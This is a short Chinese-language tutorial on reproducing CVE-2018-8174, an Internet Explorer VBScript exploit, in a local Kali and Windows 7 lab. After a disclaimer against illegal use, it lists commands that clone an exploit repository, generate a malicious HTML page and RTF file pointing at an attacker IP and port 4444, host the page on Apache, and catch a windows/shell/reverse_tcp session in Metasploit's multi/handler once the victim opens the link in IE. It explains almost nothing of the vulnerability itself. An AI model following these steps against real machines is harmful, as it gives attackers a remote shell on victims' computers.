0DAY漏洞——CVE-2018-8174复现
注:
·本文所有演示均为本地虚拟环境,讲解只是为了读者更好地理解漏洞原理,以达到保护信息安全的目的,请勿用于非法用途!
·严禁利用本文中所提到的技术和漏洞进行非法攻击,否则后果自负,作者将不承担任何责任!
环境:kali , window7系统。
步骤:1.从github下载CVE-2018-8174文件。
git clone https://github.com/XXX/XXX
2.进入到该文件中查看。
cd CVE-2018-8174_EXP-master
ls
3.生成恶意链接。
python2 CVE-2018-8174.py -u http://192.168.152.166/exploit.html -o zxs.rtf -i192.168.152.166 -p 4444
注意:CVE-2018-8174.py使用的python2版本的编写规则,如果使用python3会报错。建议大家使用python2。当提示successfully则表明已经成功。
4.可以看到此时已经生成相应的html文件。
5.将exploit.html部署到apache2中并启动该服务。
sudo cp exploit.html /var/www/html
cd /var/www/html
6.进入到msf中选择相应的exploit进行攻击。
msfconsole
use exploit/multi/handler
7.设置相应的LHOST和LPORT以及payload。
set lhost 192.168.XXX.XXX
set lport XXXX
set payload windows/shell/reverse_tcp
8.运行
run
9.在windows7中的ie浏览器打开之前设置的网址。
10.测试